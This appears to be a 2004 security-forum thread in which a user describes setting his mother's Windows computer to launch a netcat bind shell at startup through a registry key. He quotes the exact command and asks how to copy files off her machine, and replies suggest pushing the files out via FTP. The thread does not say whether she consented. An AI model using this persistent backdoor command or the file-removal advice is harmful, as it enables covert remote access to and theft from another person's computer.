UGN Security
Posted By: uncle.b Telnet trouble... - 11/10/04 11:13 AM
Yeah, I had set my moms computer up to boot netcat when windows starts, and whenever I telnet to her computer I get access. But the problem is I don't know how to retrieve files. Are there certain permissions on windows that I don't know about, or is there no file transfer through telnet?
Posted By: Gremelin Re: Telnet trouble... - 11/10/04 12:12 PM
The only "file transfer" that I've ever done through telnet (or SSH for that matter) was through wget on a linux/unix machine...

If you need file transfers you should instead try FTP vs Telnet
Posted By: uncle.b Re: Telnet trouble... - 11/10/04 01:02 PM
See what I did is I set netcat to listen on certain ports, basically 23 and 21, also I have tried using an FTP software, copying and pasting the FTP link in my browser, yet nothing happens and also Telneting on an FTP port, I would use *nix but it doesn't support my Laptop modem.
Posted By: Gremelin Re: Telnet trouble... - 11/10/04 02:35 PM
Try using an FTP client to connect to an FTP server wink
Posted By: Ice Re: Telnet trouble... - 11/11/04 03:29 AM
Quote:
Try using an FTP client to connect to an FTP server
Ya, that would be the best idea, just set up a FTP Server, u can upload and download etc..
Posted By: sinetific Re: Telnet trouble... - 11/11/04 03:57 AM
Your problem is that all netcat does is listen. It isnt a file transfer program or a remote shell server. That is why ftp or telnet do not work. The only thing that netcat does is lread and write data to a network. In read mode it is like a packet dumper. In write its like a packet generator. You need to redirect the output somehow to a shell to use shell commands.

Example:
A machine has a TCP firewall on all ports but it running a telnet server behind the firewall. You could have netcat listen on any port for UDP data pipe that data to telnet through localhost and back out from telnet through netcat as UDP.(not sure what the exact syntax would be so i wont write it.)

There are many many more uses that is one I thought that you would like though. Try reading the help files and READMEs that are included with it.

http://www.oac.uci.edu/indiv/franklin/doc/netcat.html
Posted By: uncle.b Re: Telnet trouble... - 11/11/04 06:26 AM
I know what netcat does, thats what i use it for, so i can connect to her comp. I set it to listen on the same port she is listening on, on my comp. This is exactly how i have the registry key set up on her computer: nc -l -p 21 -d -t -e cmd.exe . Then on my comp i set my netcat: nc -v -l -p 21 6*.3*.1*8.4*, then another cli and then i type: telnet 6*.3*.1*8.4* 21. I get access to her comp, i can do an ipconfig and get a listing of all the directories etc.. etc.. but then comes along the part with retrieving the file, I tried bullet FTP but it doesnt want to seem to connect right, dunno what im doing rong, i was using the Bullet FTP at the time.
Posted By: sinetific Re: Telnet trouble... - 11/11/04 06:05 PM
hmm I dont think cmd.exe has any command that would transfer a file. You might want to set up an ftp server on your machine then connect to it from hers. This way you can just 'put' or 'mput' the files to your machine use her command line ftp client from cmd.exe. If this solution isnt suitable I can think of a couple more...
Posted By: uncle.b Re: Telnet trouble... - 11/12/04 04:02 AM
I'll go ahead and try it now, I'll be back with the results...
© UGN Security Forum